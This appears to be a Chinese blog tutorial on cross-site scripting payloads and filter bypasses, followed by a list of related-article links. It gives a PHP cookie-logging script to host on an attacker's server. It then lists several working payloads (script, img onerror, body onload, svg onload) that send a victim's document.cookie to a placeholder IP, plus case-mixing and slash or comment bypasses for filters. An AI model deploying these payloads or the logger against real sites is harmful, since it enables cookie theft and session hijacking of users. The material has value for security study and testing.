XSS漏洞--常用payload及绕过

前置准备

  1. 首先准备一个自己的服务器。本地服务器,也就是127.0.0.1不行。
  2. 在服务器的公开的、可访问的目录下准备一个.php文件。我这里命名为flag.php。
  3. flag.php的源代码:
php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

代码的作用是保存从目标服务器盗取的Cookie。
前置知识的学习看这里

payload的基本形式

php 复制代码
//js脚本形式
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

//img标签。onerror是图片加载失败时触发的事件。
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//body标签。onload是页面加载完成时触发的事件。
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//svg标签。
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

绕过方法

大小写绕过:

php 复制代码
<ScRipT> <IMg> <BOdy> <SvG>

空格被过滤:

php 复制代码
使用/**/ 或者 / 绕过
<body/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
<body/**/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
相关推荐
筑梦之月7 小时前
3分钟解决ZAP打开浏览器闪退问题
web安全
m0_738120728 小时前
CTFshow系列——PHP特性Web93-96
开发语言·安全·web安全·php·ctfshow
mooyuan天天8 小时前
DVWA靶场通关笔记-存储型XSS(Stored Impossible级别)
xss·xss漏洞·存储型xss·dvwa靶场
Suckerbin12 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
喜葵12 小时前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
lingggggaaaa14 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
黄焖鸡能干四碗19 小时前
信息系统安全保护措施文件方案
大数据·开发语言·人工智能·web安全·制造
塔子终结者20 小时前
网络安全A模块专项练习任务十解析
java·服务器·网络安全
2301_7807896621 小时前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
王火火(DDoS CC防护)1 天前
服务器IP暴露被攻击了怎么办?
服务器·网络安全·ddos攻击